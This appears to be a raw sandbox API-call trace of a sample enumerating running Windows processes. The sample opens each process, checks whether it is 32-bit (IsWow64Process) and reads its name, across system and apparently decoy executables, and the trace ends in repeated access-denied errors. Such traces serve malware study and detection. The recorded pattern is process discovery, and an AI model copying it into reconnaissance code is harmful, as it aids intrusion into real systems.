	[0128.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0128.201] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.201] CloseHandle (hObject=0x2dc) returned 1
	[0128.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0128.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0128.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0128.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0128.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0128.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0128.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0128.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0128.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0128.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0128.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0128.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0128.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0128.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0128.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0128.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0128.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0128.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0128.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0128.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0128.242] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.242] CloseHandle (hObject=0x2dc) returned 1
	[0128.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0128.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0128.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0128.244] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.244] CloseHandle (hObject=0x2dc) returned 1
	[0128.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0128.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0128.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0128.245] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.245] CloseHandle (hObject=0x2dc) returned 1
	[0128.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0128.245] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.245] CloseHandle (hObject=0x2dc) returned 1
	[0128.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0128.245] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.246] CloseHandle (hObject=0x2dc) returned 1
	[0128.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0128.246] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.246] CloseHandle (hObject=0x2dc) returned 1
	[0128.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0128.246] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.246] CloseHandle (hObject=0x2dc) returned 1
	[0128.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0128.247] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.247] CloseHandle (hObject=0x2dc) returned 1
	[0128.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0128.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0128.248] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.248] CloseHandle (hObject=0x2dc) returned 1
	[0128.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0128.248] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.248] CloseHandle (hObject=0x2dc) returned 1
	[0128.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0128.248] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.249] CloseHandle (hObject=0x2dc) returned 1
	[0128.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0128.249] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.249] CloseHandle (hObject=0x2dc) returned 1
	[0128.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0128.249] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.249] CloseHandle (hObject=0x2dc) returned 1
	[0128.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0128.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0128.250] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.250] CloseHandle (hObject=0x2dc) returned 1
	[0128.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0128.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0128.250] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.250] CloseHandle (hObject=0x2dc) returned 1
	[0128.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0128.251] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.251] CloseHandle (hObject=0x2dc) returned 1
	[0128.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0128.251] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.251] CloseHandle (hObject=0x2dc) returned 1
	[0128.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0128.251] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.251] CloseHandle (hObject=0x2dc) returned 1
	[0128.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
	[0128.252] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.252] CloseHandle (hObject=0x2dc) returned 1
	[0128.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0128.252] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.252] CloseHandle (hObject=0x2dc) returned 1
	[0128.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0128.253] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.253] CloseHandle (hObject=0x2dc) returned 1
	[0128.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
	[0128.253] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.253] CloseHandle (hObject=0x2dc) returned 1
	[0128.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0128.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0128.254] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.254] CloseHandle (hObject=0x2dc) returned 1
	[0128.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0128.254] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.254] CloseHandle (hObject=0x2dc) returned 1
	[0128.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
	[0128.255] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.255] CloseHandle (hObject=0x2dc) returned 1
	[0128.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0128.255] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.255] CloseHandle (hObject=0x2dc) returned 1
	[0128.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0128.255] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.255] CloseHandle (hObject=0x2dc) returned 1
	[0128.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
	[0128.256] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.256] CloseHandle (hObject=0x2dc) returned 1
	[0128.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0128.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0128.256] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.256] CloseHandle (hObject=0x2dc) returned 1
	[0128.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0128.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0128.257] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.257] CloseHandle (hObject=0x2dc) returned 1
	[0128.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0128.257] GetLastError () returned 0x5
	[0128.257] GetLastError () returned 0x5
	[0128.257] GetLastError () returned 0x5
	[0128.257] GetLastError () returned 0x5
	[0128.257] GetLastError () returned 0x5
	[0128.257] GetLastError () returned 0x5
	[0128.257] GetLastError () returned 0x5
	[0128.257] GetLastError () returned 0x5
	[0128.257] GetLastError () returned 0x5
	[0128.257] GetLastError () returned 0x5
